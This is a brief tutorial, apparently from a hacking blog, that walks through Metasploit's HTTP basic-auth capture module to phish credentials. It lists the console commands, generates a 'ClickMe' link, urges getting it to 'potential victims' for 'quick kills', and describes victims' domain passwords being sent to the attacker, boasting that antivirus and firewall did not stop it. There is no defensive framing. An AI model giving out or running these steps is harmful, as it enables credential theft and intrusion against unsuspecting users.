METASPLOIT - Stealing Credentials (The Lazy Way)

Just when you think its all harmless and innocent.....

In this example, we are going to show how easy it is to steal credentials through deception. Fire up our metasploit,

#msfconsole

#msf > use auxiliary/server/capture/http_basic

#msf auxiliary(http_basic) > set URIPATH ClickMe

#msf auxiliary(http_basic) > exploit

A link will be generated and in this case its http://192.168.71.169:80/ClickMe. For quick kills, you need to find a way to provide this link to potential victims.

Once the victim receives the link and enters it in the URL;

A username and password is asked. Typically, unknown victims will input their domain credentials. For this example, i used the username= 'windowsusername' and the password='domainpassword'.

When the victim clicks Log In, the credentials are being sent to the attacker!

*Test was done with Mcafee AV status updated and Windows Firewall On. :)